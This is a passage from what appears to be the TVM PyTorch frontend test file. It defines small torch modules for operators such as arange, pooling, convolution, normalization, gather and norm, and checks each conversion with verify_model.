    verify_model(Multiply4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_min_max():
    """min/max: full reduction, reduction along a dim, and elementwise binary."""
    class Max(Module):
        def forward(self, inp):
            return torch.max(inp)
    class Min(Module):
        def forward(self, inp):
            return torch.min(inp)
    class Max2(Module):
        def forward(self, inp):
            # Dim-reduction variant returns (values, indices); keep values only.
            out, _ = torch.max(inp, 1, keepdim=True)
            return out
    class Min2(Module):
        def forward(self, inp):
            out, _ = torch.min(inp, 0, keepdim=False)
            return out
    class Max3(Module):
        def forward(self, lhs, rhs):
            return torch.max(lhs, rhs)
    class Min3(Module):
        def forward(self, lhs, rhs):
            return torch.min(lhs, rhs)
    input_data = [torch.rand((10, 10)), torch.rand((10, 10))]
    verify_model(Max(), input_data=input_data[0])
    verify_model(Min(), input_data=input_data[0])
    verify_model(Max2(), input_data=input_data[0])
    verify_model(Min2(), input_data=input_data[0])
    verify_model(Max3(), input_data=input_data)
    verify_model(Min3(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_reciprocal():
    """Elementwise reciprocal on a 5-d input."""
    torch.set_grad_enabled(False)

    class Reciprocal1(Module):
        def forward(self, *args):
            return args[0].reciprocal()

    verify_model(Reciprocal1().float().eval(),
                 input_data=torch.rand([2, 1, 10, 1, 10]).float())
@tvm.testing.uses_gpu
def test_forward_repeat():
    """Tensor.repeat: identity tile, 2-d tiling, and rank-expanding tiling."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3]
    class Repeat1(Module):
        def forward(self, *args):
            return args[0].repeat(1, 1)
    class Repeat2(Module):
        def forward(self, *args):
            return args[0].repeat(4, 2)
    class Repeat3(Module):
        def forward(self, *args):
            # Three repeat factors on a 2-d input add a leading dimension.
            return args[0].repeat(4, 2, 1)
    input_data = torch.rand(input_shape).float()
    verify_model(Repeat1().float().eval(), input_data=input_data)
    verify_model(Repeat2().float().eval(), input_data=input_data)
    verify_model(Repeat3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_repeat_interleave():
    """repeat_interleave: flattened form and along each of the three dims."""
    torch.set_grad_enabled(False)
    input_shape = [2, 2, 3]
    class RepeatInterleave1(Module):
        def forward(self, *args):
            # No dim argument: operates on the flattened tensor.
            return args[0].repeat_interleave(2)
    class RepeatInterleave2(Module):
        def forward(self, *args):
            return args[0].repeat_interleave(3, dim=0)
    class RepeatInterleave3(Module):
        def forward(self, *args):
            return args[0].repeat_interleave(2, dim=1)
    class RepeatInterleave4(Module):
        def forward(self, *args):
            return args[0].repeat_interleave(4, dim=2)
    input_data = torch.rand(input_shape).float()
    verify_model(RepeatInterleave1().float().eval(), input_data=input_data)
    verify_model(RepeatInterleave2().float().eval(), input_data=input_data)
    verify_model(RepeatInterleave3().float().eval(), input_data=input_data)
    verify_model(RepeatInterleave4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_unsqueeze():
    """Tensor.unsqueeze along a fixed trailing axis."""
    torch.set_grad_enabled(False)

    class Unsqueeze1(Module):
        def forward(self, *args):
            return args[0].unsqueeze(2)

    verify_model(Unsqueeze1().float().eval(), input_data=torch.rand([10, 10]).float())
@tvm.testing.uses_gpu
def test_forward_squeeze():
    """Tensor.squeeze: drop all size-1 dims, and drop only a specific dim."""
    torch.set_grad_enabled(False)
    input_shape = [2, 1, 10, 1, 10]
    class Squeeze1(Module):
        def forward(self, *args):
            return args[0].squeeze()
    class Squeeze2(Module):
        def forward(self, *args):
            return args[0].squeeze(1)
    input_data = torch.rand(input_shape).float()
    verify_model(Squeeze1().float().eval(), input_data=input_data)
    verify_model(Squeeze2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_arange():
    """torch.arange: constant and dynamic start/end/step, int and float dtypes."""
    torch.set_grad_enabled(False)
    class Arange1(Module):
        def forward(self, *args):
            return torch.arange(5)
    class Arange2(Module):
        def forward(self, *args):
            return torch.arange(2.5)
    class Arange3(Module):
        def forward(self, *args):
            return torch.arange(1, 4)
    class Arange4(Module):
        def forward(self, *args):
            return torch.arange(1, 2.5, 0.5)
    class Arange5(Module):
        def forward(self, *args):
            return torch.arange(1, 2, 1, dtype=torch.int32)
    class Arange6(Module):
        def forward(self, *args):
            return torch.arange(start=1, end=6, step=2)
    class Arange7(Module):
        def forward(self, *args):
            return torch.arange(1, 4, dtype=torch.float32)
    class Arange8(Module):
        def forward(self, *args):
            return torch.arange(1, 2, 1, dtype=torch.int16)
    class Arange9(Module):
        def forward(self, *args):
            # end computed at runtime from a tensor (dynamic shape case).
            end = torch.add(torch.tensor(4), 1)
            return torch.arange(end) + torch.ones((5,), dtype=torch.int64)
    class Arange10(Module):
        def forward(self, *args):
            end = torch.add(torch.tensor(4.0), torch.tensor(1.0))
            return torch.arange(end) + torch.ones((5,), dtype=torch.float)
    class Arange11(Module):
        def forward(self, *args):
            # start/end/step all computed at runtime (int case).
            start = torch.add(torch.tensor(1), 1)
            end = torch.add(torch.tensor(4), 1)
            step = torch.add(torch.tensor(2), 1)
            out = torch.arange(start, end, step)
            return out + torch.ones((3,), dtype=torch.int64)
    class Arange12(Module):
        def forward(self, *args):
            # int start/end with a float step promotes to float output.
            start = torch.add(torch.tensor(1), 1)
            end = torch.add(torch.tensor(4), 1)
            step = torch.add(torch.tensor(2.5), torch.tensor(4.1))
            out = torch.arange(start, end, step)
            return out + torch.ones((3,), dtype=torch.float)
    verify_model(Arange1().float().eval())
    verify_model(Arange2().float().eval())
    verify_model(Arange3().float().eval())
    verify_model(Arange4().float().eval())
    verify_model(Arange5().float().eval())
    verify_model(Arange6().float().eval())
    verify_model(Arange7().float().eval())
    verify_model(Arange8().float().eval())
    verify_model(Arange9().float().eval())
    verify_model(Arange10().float().eval())
    verify_model(Arange11().float().eval())
    verify_model(Arange12().float().eval())
@tvm.testing.uses_gpu
def test_forward_mesh_grid():
    """torch.meshgrid over constant 1-d tensors and a runtime-computed scalar."""
    torch.set_grad_enabled(False)
    class MeshGrid1(Module):
        def forward(self, *args):
            x = torch.tensor([1, 2, 3])
            y = torch.tensor([4, 5, 6])
            grid_x, grid_y = torch.meshgrid([x, y])
            return grid_x, grid_y
    class MeshGrid2(Module):
        def forward(self, *args):
            x = torch.tensor([1, 2, 3], dtype=torch.float32)
            # 0-d tensor operand produced at runtime.
            y = torch.add(torch.tensor(5, dtype=torch.float32), 1)
            grid_x, grid_y = torch.meshgrid([x, y])
            return grid_x, grid_y
    verify_model(MeshGrid1().float().eval())
    verify_model(MeshGrid2().float().eval())
@tvm.testing.uses_gpu
def test_forward_abs():
    """Elementwise absolute value on a 5-d input."""
    torch.set_grad_enabled(False)

    class Abs1(Module):
        def forward(self, *args):
            return args[0].abs()

    verify_model(Abs1().float().eval(),
                 input_data=torch.rand([2, 1, 10, 1, 10]).float())
@tvm.testing.uses_gpu
def test_forward_concatenate():
    """torch.cat of sliced-and-unsqueezed channels along two different dims."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class Concatenate1(Module):
        def forward(self, *args):
            return torch.cat([args[0][:, 0].unsqueeze(1), args[0][:, 1].unsqueeze(1)], 1)
    class Concatenate2(Module):
        def forward(self, *args):
            # Distinct affine transforms per slice keep the pieces distinguishable.
            a = (args[0][:, :, 0] + 2) * 7
            b = (args[0][:, :, 1] + 3) * 11
            c = (args[0][:, :, 2] + 5) * 13
            return torch.cat([t.unsqueeze(2) for t in [a, b, c]], 2)
    input_data = torch.rand(input_shape).float()
    verify_model(Concatenate1().float().eval(), input_data=input_data)
    verify_model(Concatenate2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_relu():
    """nn.ReLU activation."""
    torch.set_grad_enabled(False)
    verify_model(torch.nn.ReLU().eval(), input_data=torch.rand([10, 10]).float())
@tvm.testing.uses_gpu
def test_forward_prelu():
    """nn.PReLU with one learned slope per input channel."""
    torch.set_grad_enabled(False)
    verify_model(torch.nn.PReLU(num_parameters=3).eval(),
                 input_data=torch.rand([1, 3, 10, 10]).float())
@tvm.testing.uses_gpu
def test_forward_leakyrelu():
    """nn.LeakyReLU across several negative slopes, with and without inplace."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.LeakyReLU().eval(), input_data=input_data)
    verify_model(torch.nn.LeakyReLU(negative_slope=0.05).eval(), input_data=input_data)
    verify_model(torch.nn.LeakyReLU(negative_slope=1.0, inplace=True).eval(), input_data=input_data)
    verify_model(
        torch.nn.LeakyReLU(negative_slope=1.25, inplace=True).eval(), input_data=input_data
    )
@tvm.testing.uses_gpu
def test_forward_elu():
    """nn.ELU over a range of alpha values (ELU() defaults to alpha=1.0)."""
    torch.set_grad_enabled(False)
    inp = torch.rand([1, 3, 10, 10]).float()
    for alpha in (1.0, 0.3, 1.0, 1.3):
        verify_model(torch.nn.ELU(alpha=alpha).eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_celu():
    """nn.CELU over a range of alpha values (CELU() defaults to alpha=1.0)."""
    torch.set_grad_enabled(False)
    inp = torch.rand([1, 3, 10, 10]).float()
    for alpha in (1.0, 0.3, 1.0, 1.3):
        verify_model(torch.nn.CELU(alpha=alpha).eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_gelu():
    """nn.GELU activation."""
    torch.set_grad_enabled(False)
    verify_model(torch.nn.GELU().eval(), input_data=torch.rand([1, 3, 10, 10]).float())
@tvm.testing.uses_gpu
def test_forward_selu():
    """nn.SELU activation."""
    torch.set_grad_enabled(False)
    verify_model(torch.nn.SELU().eval(), input_data=torch.rand([1, 3, 10, 10]).float())
@tvm.testing.uses_gpu
def test_forward_softplus():
    """nn.Softplus with default and custom beta/threshold settings."""
    torch.set_grad_enabled(False)
    inp = torch.rand([1, 3, 10, 10]).float()
    for kwargs in ({}, {"beta": 1.5, "threshold": 20}, {"beta": 5, "threshold": 10}):
        verify_model(torch.nn.Softplus(**kwargs).eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_softsign():
    """nn.Softsign activation."""
    torch.set_grad_enabled(False)
    verify_model(torch.nn.Softsign().eval(), input_data=torch.rand([1, 3, 10, 10]).float())
@tvm.testing.uses_gpu
def test_forward_log_sigmoid():
    """Exercise torch.nn.LogSigmoid on a 2-D random input."""
    torch.set_grad_enabled(False)
    inp = torch.rand([10, 10]).float()
    verify_model(torch.nn.LogSigmoid().eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_adaptiveavgpool():
    """Exercise torch.nn.AdaptiveAvgPool2d with global (1x1) and identity (10x10) output sizes."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.AdaptiveAvgPool2d([1, 1]).eval(), input_data=input_data)
    verify_model(torch.nn.AdaptiveAvgPool2d([10, 10]).eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_maxpool2d():
    """Exercise 2-D max pooling: module form, functional form, and return_indices=True."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.MaxPool2d(kernel_size=[1, 1]).eval(), input_data)
    verify_model(torch.nn.MaxPool2d(kernel_size=[10, 10]).eval(), input_data)
    verify_model(torch.nn.MaxPool2d(kernel_size=[4, 4], padding=2, stride=2).eval(), input_data)
    # A functional variant (default strides = None case)
    class MaxPool2D(Module):
        def forward(self, *args):
            return torch.nn.functional.max_pool2d(args[0], kernel_size=[10, 10])
    verify_model(MaxPool2D(), input_data=input_data)
    class MaxPool2DWithIndices(Module):
        def __init__(self):
            super(MaxPool2DWithIndices, self).__init__()
            self.pool = torch.nn.MaxPool2d(kernel_size=[1, 1], return_indices=True)
        def forward(self, *args):
            # Indices output is intentionally dropped; only the pooled values are compared.
            output, indices = self.pool(args[0])
            return output
    verify_model(MaxPool2DWithIndices().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_maxpool1d():
    """Exercise 1-D max pooling in both module and functional forms."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.MaxPool1d(kernel_size=1).eval(), input_data)
    verify_model(torch.nn.MaxPool1d(kernel_size=10).eval(), input_data)
    verify_model(torch.nn.MaxPool1d(kernel_size=4, padding=2, stride=2).eval(), input_data)
    # A functional variant (default strides = None case)
    class MaxPool1D(Module):
        def forward(self, *args):
            return torch.nn.functional.max_pool1d(args[0], kernel_size=10)
    verify_model(MaxPool1D(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_maxpool3d():
    """Exercise 3-D max pooling in both module and functional forms."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.MaxPool3d(kernel_size=[1, 1, 1]).eval(), input_data)
    verify_model(torch.nn.MaxPool3d(kernel_size=[10, 10, 10]).eval(), input_data)
    verify_model(torch.nn.MaxPool3d(kernel_size=[4, 4, 4], padding=2, stride=2).eval(), input_data)
    # A functional variant (default strides = None case)
    class MaxPool3D(Module):
        def forward(self, *args):
            return torch.nn.functional.max_pool3d(args[0], kernel_size=[10, 10, 10])
    verify_model(MaxPool3D(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_split():
    """Exercise torch.split with equal chunk sizes and an explicit section list."""
    torch.set_grad_enabled(False)
    input_shape = [4, 10]
    class Split(Module):
        def __init__(self, split_size_or_sections, dim):
            super(Split, self).__init__()
            self.split_size_or_sections = split_size_or_sections
            self.dim = dim
        def forward(self, *args):
            return torch.split(args[0], self.split_size_or_sections, self.dim)
    input_data = torch.rand(input_shape).float()
    verify_model(Split(2, 0).float().eval(), input_data=input_data)
    verify_model(Split(3, 1).float().eval(), input_data=input_data)
    verify_model(Split(4, 1).float().eval(), input_data=input_data)
    verify_model(Split([2, 3, 5], 1).float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_avgpool():
    """Exercise 2-D average pooling in both module and functional forms."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class AvgPool2D2(Module):
        def forward(self, *args):
            return torch.nn.functional.avg_pool2d(args[0], kernel_size=[10, 10])
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.AvgPool2d(kernel_size=[10, 10]).eval(), input_data=input_data)
    verify_model(AvgPool2D2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_avgpool3d():
    """Exercise 3-D average pooling in both module and functional forms."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10, 10]
    class AvgPool3D1(Module):
        def forward(self, *args):
            return torch.nn.functional.avg_pool3d(args[0], kernel_size=[10, 10, 10])
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.AvgPool3d(kernel_size=[10, 10, 10]).eval(), input_data=input_data)
    verify_model(AvgPool3D1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_hardtanh():
    """Exercise torch.nn.Hardtanh with its default bounds on a 1-D input."""
    torch.set_grad_enabled(False)
    inp = torch.rand([10]).float()
    verify_model(torch.nn.Hardtanh().eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_conv():
    """Exercise 1-D and 2-D convolution: with/without bias, grouped, and depthwise."""
    torch.set_grad_enabled(False)
    conv1d_input_shape = [1, 3, 10]
    conv2d_input_shape = [1, 3, 10, 10]
    class Conv2D1(Module):
        # 2-D conv with bias, softmax applied to the result.
        def __init__(self):
            super(Conv2D1, self).__init__()
            self.conv = torch.nn.Conv2d(3, 6, 7, bias=True)
            self.softmax = torch.nn.Softmax()
        def forward(self, *args):
            return self.softmax(self.conv(args[0]))
    class Conv2D2(Module):
        # 2-D conv without bias.
        def __init__(self):
            super(Conv2D2, self).__init__()
            self.conv = torch.nn.Conv2d(3, 6, 7, bias=False)
            self.softmax = torch.nn.Softmax()
        def forward(self, *args):
            return self.softmax(self.conv(args[0]))
    class Conv2D3(Module):
        # Depthwise 2-D conv: groups == in_channels == 3, channel multiplier 2.
        def __init__(self):
            super(Conv2D3, self).__init__()
            self.conv = torch.nn.Conv2d(3, 6, 7, groups=3, bias=False)
            self.softmax = torch.nn.Softmax()
        def forward(self, *args):
            return self.softmax(self.conv(args[0]))
    class Conv1D1(Module):
        # 1-D conv with (default) bias.
        def __init__(self):
            super(Conv1D1, self).__init__()
            self.conv = torch.nn.Conv1d(3, 6, 7)
            self.softmax = torch.nn.Softmax()
        def forward(self, *args):
            return self.softmax(self.conv(args[0]))
    class Conv1D2(Module):
        # 1-D conv without bias.
        def __init__(self):
            super(Conv1D2, self).__init__()
            self.conv = torch.nn.Conv1d(3, 6, 7, bias=False)
            self.softmax = torch.nn.Softmax()
        def forward(self, *args):
            return self.softmax(self.conv(args[0]))
    class Conv1D3(Module):
        # Depthwise 1-D conv: groups == in_channels == 3.
        def __init__(self):
            super(Conv1D3, self).__init__()
            self.conv = torch.nn.Conv1d(3, 6, 7, groups=3, bias=False)
            self.softmax = torch.nn.Softmax()
        def forward(self, *args):
            return self.softmax(self.conv(args[0]))
    conv2d_input_data = torch.rand(conv2d_input_shape).float()
    verify_model(Conv2D1().float().eval(), input_data=conv2d_input_data)
    verify_model(Conv2D2().float().eval(), input_data=conv2d_input_data)
    # depth wise conv with channel mult 2
    verify_model(Conv2D3().float().eval(), input_data=conv2d_input_data)
    # group conv
    verify_model(
        torch.nn.Conv2d(8, 8, kernel_size=(3, 3), stride=(1, 1), groups=2).eval(),
        input_data=torch.randn((1, 8, 16, 16)),
    )
    conv1d_input_data = torch.rand(conv1d_input_shape).float()
    verify_model(Conv1D1().float().eval(), input_data=conv1d_input_data)
    verify_model(Conv1D2().float().eval(), input_data=conv1d_input_data)
    verify_model(Conv1D3().float().eval(), input_data=conv1d_input_data)
@tvm.testing.uses_gpu
def test_forward_conv_transpose():
    """Exercise 1-D and 2-D transposed convolution with and without bias."""
    torch.set_grad_enabled(False)
    conv2d_input_shape = [1, 3, 10, 10]
    conv2d_input_data = torch.rand(conv2d_input_shape).float()
    verify_model(torch.nn.ConvTranspose2d(3, 6, 7, bias=True), input_data=conv2d_input_data)
    verify_model(torch.nn.ConvTranspose2d(3, 12, 3, bias=False), input_data=conv2d_input_data)
    conv1d_input_shape = [1, 3, 10]
    conv1d_input_data = torch.rand(conv1d_input_shape).float()
    verify_model(torch.nn.ConvTranspose1d(3, 6, 7, bias=True), input_data=conv1d_input_data)
    verify_model(torch.nn.ConvTranspose1d(3, 12, 3, bias=False), input_data=conv1d_input_data)
@tvm.testing.uses_gpu
def test_forward_threshold():
    """Exercise torch.nn.Threshold(0, 0) on a small 2-D input."""
    torch.set_grad_enabled(False)
    inp = torch.rand([1, 3]).float()
    verify_model(torch.nn.Threshold(0, 0).float().eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_contiguous():
    """Exercise Tensor.contiguous() on a 1-D input."""
    torch.set_grad_enabled(False)
    input_shape = [10]
    class Contiguous1(Module):
        def forward(self, *args):
            return args[0].contiguous()
    input_data = torch.rand(input_shape).float()
    verify_model(Contiguous1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_batchnorm():
    """Exercise BatchNorm2d/BatchNorm3d with randomly initialized affine parameters."""
    def init_weight(m):
        # Randomize gamma/beta so the affine transform is non-trivial.
        torch.nn.init.normal_(m.weight, 0, 0.01)
        torch.nn.init.normal_(m.bias)
    inp_2d = torch.rand((1, 16, 10, 10))
    inp_3d = torch.rand((1, 16, 10, 10, 10))
    for bn, inp in [(torch.nn.BatchNorm2d(16), inp_2d), (torch.nn.BatchNorm3d(16), inp_3d)]:
        init_weight(bn.eval())
        verify_model(bn.eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_instancenorm():
    """Exercise InstanceNorm2d/InstanceNorm3d on matching 4-D/5-D inputs."""
    inp_2d = torch.rand((1, 16, 10, 10))
    inp_3d = torch.rand((1, 16, 10, 10, 10))
    for ins_norm, inp in [
        (torch.nn.InstanceNorm2d(16), inp_2d),
        (torch.nn.InstanceNorm3d(16), inp_3d),
    ]:
        verify_model(ins_norm.eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_layernorm():
    """Exercise LayerNorm (over the last dim of size 10) on 4-D and 5-D inputs."""
    def init_weight(m):
        # Randomize gamma/beta so the affine transform is non-trivial.
        torch.nn.init.normal_(m.weight, 0, 0.01)
        torch.nn.init.normal_(m.bias, 0.02)
    inp_2d = torch.rand((1, 16, 10, 10))
    inp_3d = torch.rand((1, 16, 10, 10, 10))
    for ln, inp in [(torch.nn.LayerNorm(10), inp_2d), (torch.nn.LayerNorm(10), inp_3d)]:
        init_weight(ln.eval())
        verify_model(ln.eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_groupnorm():
    """Exercise GroupNorm across group counts from 1 (LayerNorm-like) to C (InstanceNorm-like)."""
    input_shape = [10, 6, 5, 5]
    input_data = torch.rand(input_shape).float()
    # Separate 6 channels into 3 groups
    verify_model(torch.nn.GroupNorm(3, 6).eval(), input_data=input_data)
    # Put all 6 channels into a single group (equivalent with LayerNorm)
    verify_model(torch.nn.GroupNorm(1, 6).eval(), input_data=input_data)
    # Separate 6 channels into 6 groups (equivalent with InstanceNorm)
    verify_model(torch.nn.GroupNorm(6, 6).eval(), input_data=input_data)
    input_shape = [1, 10, 4, 7]
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.GroupNorm(1, 10).eval(), input_data=input_data)
    verify_model(torch.nn.GroupNorm(2, 10).eval(), input_data=input_data)
    verify_model(torch.nn.GroupNorm(5, 10).eval(), input_data=input_data)
    verify_model(torch.nn.GroupNorm(10, 10).eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_reshape():
    """Exercise Tensor.reshape with a static shape, a flatten (-1), and a shape computed from x.shape."""
    torch.set_grad_enabled(False)
    input_shape = [2, 1, 10, 1, 10]
    new_shape = [2, 1, 10, 10]
    class Reshape1(Module):
        def forward(self, *args):
            return args[0].reshape(new_shape)
    class Reshape2(Module):
        def forward(self, *args):
            return args[0].reshape([-1])
    class Reshape3(torch.nn.Module):
        def forward(self, x):
            # Target shape is derived from the runtime input shape.
            x_shape = x.shape
            return x.reshape((x_shape[0] * x_shape[1], x_shape[2]))
    input_data = torch.rand(input_shape).float()
    verify_model(Reshape1(), input_data=input_data)
    verify_model(Reshape2(), input_data=input_data)
    verify_model(Reshape3(), input_data=torch.randn(2, 3, 4))
@tvm.testing.uses_gpu
def test_flatten():
    """Exercise torch.flatten both fully and from start_dim=1 (batch flatten)."""
    class Flatten(Module):
        def forward(self, x):
            return torch.flatten(x)
    class BatchFlatten(Module):
        def forward(self, x):
            return torch.flatten(x, start_dim=1)
    inp = torch.rand((5, 2, 2))
    verify_model(Flatten(), input_data=inp)
    verify_model(BatchFlatten(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_transpose():
    """Exercise Tensor.transpose (positive and negative dims) and Tensor.permute."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class Transpose1(Module):
        def forward(self, *args):
            return args[0].transpose(2, 3)
    class Transpose2(Module):
        def forward(self, *args):
            return args[0].transpose(-2, -1)
    class Transpose3(Module):
        def forward(self, *args):
            return args[0].permute(0, 2, 3, 1)
    input_data = torch.rand(input_shape).float()
    verify_model(Transpose1().float().eval(), input_data=input_data)
    verify_model(Transpose2().float().eval(), input_data=input_data)
    verify_model(Transpose3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_size():
    """Exercise Tensor.size(dim) used as a scalar inside arithmetic."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3]
    class Size1(Module):
        def forward(self, *args):
            return float(args[0].size(0)) * args[0]
    input_data = torch.rand(input_shape).float()
    verify_model(Size1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_type_as():
    """Exercise Tensor.type_as against reference tensors of several dtypes.

    Fix: the caught exception was bound to an unused name (``as e``); the
    binding is dropped.
    """
    torch.set_grad_enabled(False)
    input_shape = [1, 3]

    def _create_module(dtype):
        # Each module casts its input to the dtype of a zero reference tensor.
        class TypeAs(Module):
            def forward(self, *args):
                expected_type_tensor = torch.zeros(1, 3, dtype=dtype)
                return args[0].type_as(expected_type_tensor)

        return TypeAs()

    input_data = torch.randn(input_shape).float()
    verify_model(_create_module(torch.float64), input_data=input_data)
    verify_model(_create_module(torch.float32), input_data=input_data)
    verify_model(_create_module(torch.int64), input_data=input_data)
    verify_model(_create_module(torch.int32), input_data=input_data)
    verify_model(_create_module(torch.int16), input_data=input_data)
    verify_model(_create_module(torch.int8), input_data=input_data)
    if torch.cuda.is_available():
        check_fp16 = False
        try:
            # Only check half precision on supported hardwares.
            if have_fp16(tvm.gpu(0).compute_version):
                check_fp16 = True
        except Exception:
            # If GPU is not enabled in TVM, skip the fp16 test.
            pass
        # Temporary disable fp16 test
        check_fp16 = False
        if check_fp16:
            verify_model(_create_module(torch.float16), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_view():
    """Exercise Tensor.view with static, inferred (-1), and tensor-valued shape arguments."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class View1(Module):
        def forward(self, *args):
            return args[0].view((1, 3 * 10 * 10))
    class View2(Module):
        def forward(self, *args):
            return args[0].view(args[0].shape[0], -1)
    class View3(Module):
        def forward(self, *args):
            # Shape dimension computed from scalar tensors.
            d1 = torch.tensor(3) * torch.tensor(10) * torch.tensor(10)
            return args[0].view(args[0].shape[0], d1)
    input_data = torch.rand(input_shape).float()
    verify_model(View1().float().eval(), input_data=input_data)
    verify_model(View2().float().eval(), input_data=input_data)
    verify_model(View3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_select():
    """Exercise Tensor.select and torch.index_select (with a captured constant input)."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class Select1(Module):
        def forward(self, *args):
            return args[0].select(1, 1)
    class IndexedSelect(Module):
        def __init__(self, inp, dim):
            super().__init__()
            # The data tensor is baked into the module; only the index is a model input.
            self.inp = inp
            self.dim = dim
            if torch.cuda.is_available():
                self.inp = self.inp.cuda()
        def forward(self, index):
            return torch.index_select(self.inp, self.dim, index)
    input_data = torch.rand(input_shape).float()
    verify_model(Select1().float().eval(), input_data=input_data)
    x = torch.randn(3, 4)
    indices = torch.tensor([0, 2])
    verify_model(IndexedSelect(x, 0).eval(), input_data=indices)
    verify_model(IndexedSelect(x, 1).eval(), input_data=indices)
@tvm.testing.uses_gpu
def test_forward_clone():
    """Exercise Tensor.clone() on a 1-D input."""
    torch.set_grad_enabled(False)
    input_shape = [10]
    class Clone1(Module):
        def forward(self, *args):
            return args[0].clone()
    input_data = torch.rand(input_shape).float()
    verify_model(Clone1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_gather():
    """Exercise torch.gather along dims 0, 1, and 2 on 1-D/2-D/3-D inputs."""
    torch.set_grad_enabled(False)
    class Gather1(Module):
        def forward(self, *args):
            return torch.gather(args[0], 0, args[1])
    class Gather2(Module):
        def forward(self, *args):
            return torch.gather(args[0], 1, args[1])
    class Gather3(Module):
        def forward(self, *args):
            return torch.gather(args[0], 2, args[1])
    input_data = torch.rand((4,)).float()
    index = torch.tensor([1])
    verify_model(Gather1().float().eval(), input_data=[input_data, index])
    input_data = torch.rand((2, 2)).float()
    index = torch.tensor([[1, 0], [0, 1]])
    verify_model(Gather1().float().eval(), input_data=[input_data, index])
    # Integer data tensor, not just floats.
    input_data = torch.tensor([[1, 2], [3, 4]])
    index = torch.tensor([[0, 0], [1, 0]])
    verify_model(Gather2().float().eval(), input_data=[input_data, index])
    input_data = torch.rand((2, 2)).float()
    index = torch.tensor([[1, 0], [0, 1]])
    verify_model(Gather2().float().eval(), input_data=[input_data, index])
    input_data = torch.rand((3, 3, 3)).float()
    index = torch.tensor(
        [
            [[1, 0, 0], [1, 0, 1], [0, 1, 1]],
            [[1, 1, 1], [1, 2, 1], [1, 0, 1]],
            [[1, 2, 1], [1, 2, 1], [1, 2, 1]],
        ]
    )
    verify_model(Gather3().float().eval(), input_data=[input_data, index])
@tvm.testing.uses_gpu
def test_forward_logsoftmax():
    """Exercise torch.nn.LogSoftmax applied to a 2-D slice of the input."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class LogSoftmax1(Module):
        def forward(self, *args):
            return torch.nn.LogSoftmax(dim=1)(args[0][0, 0])
    input_data = torch.rand(input_shape).float()
    verify_model(LogSoftmax1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_norm():
    """Exercise torch.norm over many p values (inf, -inf, fractional, negative) and dim/keepdim combos."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class Norm1(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float("inf"), dim=None, keepdim=False)
    class Norm2(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float("-inf"), dim=None, keepdim=False)
    class Norm3(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float("-inf"), dim=None, keepdim=True)
    class Norm4(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float("inf"), dim=(1, 2), keepdim=False)
    class Norm5(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float("inf"), dim=(1), keepdim=True)
    class Norm6(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float(0.5), dim=(1), keepdim=True)
    class Norm7(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float(1), dim=None, keepdim=False)
    class Norm8(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float(2.0), dim=(1), keepdim=True)
    class Norm9(Module):
        def forward(self, *args):
